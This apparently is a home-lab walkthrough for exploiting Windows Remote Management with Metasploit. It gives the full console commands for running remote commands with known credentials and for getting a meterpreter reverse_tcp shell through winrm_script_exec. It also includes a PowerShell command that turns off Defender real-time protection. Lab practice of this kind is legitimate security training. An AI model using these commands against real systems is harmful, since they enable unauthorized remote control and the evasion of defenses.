• In a Windows-based environment, IT professionals often require the ability to remotely manage and execute commands on other Windows-based devices. For this purpose, they rely on a common protocol or application like Web Services Management (WS-Management). WS-Management allows for the exchange of management information across different operating systems and services on a network. Notably, Microsoft has developed its own implementation of the WS-Management protocol, known as Windows Remote Management (WinRM), tailored specifically for Microsoft Windows operating systems.

exploitation:

  1. Open kali for scanning and exploitation: we_1
  2. Open up msfconsole for exploitation part:
sudo msfconsole
use auxiliary/scanner/winrm/winrm_cmd
msf auxiliary(scanner/winrm/winrm_cmd) > set RHOSTS 192.168.83.140
RHOSTS => 192.168.83.140
msf auxiliary(scanner/winrm/winrm_cmd) > set USERNAME Administrator
USERNAME => Administrator
msf auxiliary(scanner/winrm/winrm_cmd) > set PASSWORD P@ssword1
PASSWORD => P@ssword1
  1. By default the command that will execute it is ipconfig /all we_2 we_3
  2. Remember the setup of localuser for winrm access where we gave access to the user sysadmin , let’s try that: we_4 we_5
  • It actually worked.

  1. Now let’s try for Remote shell:
msf6 > use exploit/windows/winrm/winrm_script_exec 
msf6 exploit(windows/winrm/winrm_script_exec) > set RHOSTS 192.168.83.140 
msf6 exploit(windows/winrm/winrm_script_exec) > set LHOST 192.168.83.128
  1. Also turn off real time protection in your windwos server , because it will quarantine the execution.
  • use this command on powershell into your DC
Set-MpPreference -DisableRealtimeMonitoring $true

we_6 3. After selecting the exploit/windows/winrm/winrm_script_exec module, a reverse shell payload was automatically coupled with the exploit module within Metasploit. we_7 4. For the exploit/windows/winrm/winrm_script_exec module to have a better chance of success, force the exploit module to use the VBS CmdStager option in case your target is an old system, if not set it to false only, let’s see the options:

msf exploit(windows/winrm/winrm_script_exec) > set DOMAIN REDTEAMLAB
DOMAIN => REDTEAMLAB
msf exploit(windows/winrm/winrm_script_exec) > set USERNAME Administrator
USERNAME => Administrator
msf exploit(windows/winrm/winrm_script_exec) > set PASSWORD Password123
PASSWORD => Password123
msf exploit(windows/winrm/winrm_script_exec) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/winrm/winrm_script_exec) > set FORCE_VBS false
FORCE_VBS => false

we_8 we_9

  • run the exploit: we_10